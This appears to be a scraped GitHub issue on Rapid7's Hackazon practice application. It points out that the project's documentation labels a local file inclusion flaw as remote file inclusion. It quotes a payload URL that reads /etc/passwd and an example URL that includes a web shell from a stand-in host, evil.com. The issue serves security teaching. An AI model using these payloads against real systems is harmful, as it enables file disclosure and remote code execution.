hackazon icon indicating copy to clipboard operation
hackazon copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Vulnerability Misclassified

Open jhaddix opened this issue 7 years ago • 0 comments

In your practise application you have misclassified LFI as RFI.

on https://github.com/rapid7/hackazon/blob/master/VULNERABILITIES.md

you say:

Remote File Include:

RFI Injection allows to use an app logic where the app includes some file based on user input. In our app it's implemented in the Help Articles section:

http://hackazon.dev/account/help_articles?page=add_product_to_cart Vulnerability can be used as such:

http://hackazon.dev/account/help_articles?page=/etc/passwd%00

This is pulling a local file, and the vuln present is LFI not RFI.

RFI would be using the script to pull in external content like a flash plugin or a text file from an external server that then gets parsed and included in-line to exploit either the user or the system. Like so:

http://hackazon.dev/account/help_articles?page=http://evil.com/shell.txt

the value of which would be a web shell like so:

jhaddix avatar Oct 28 '16 22:10 jhaddix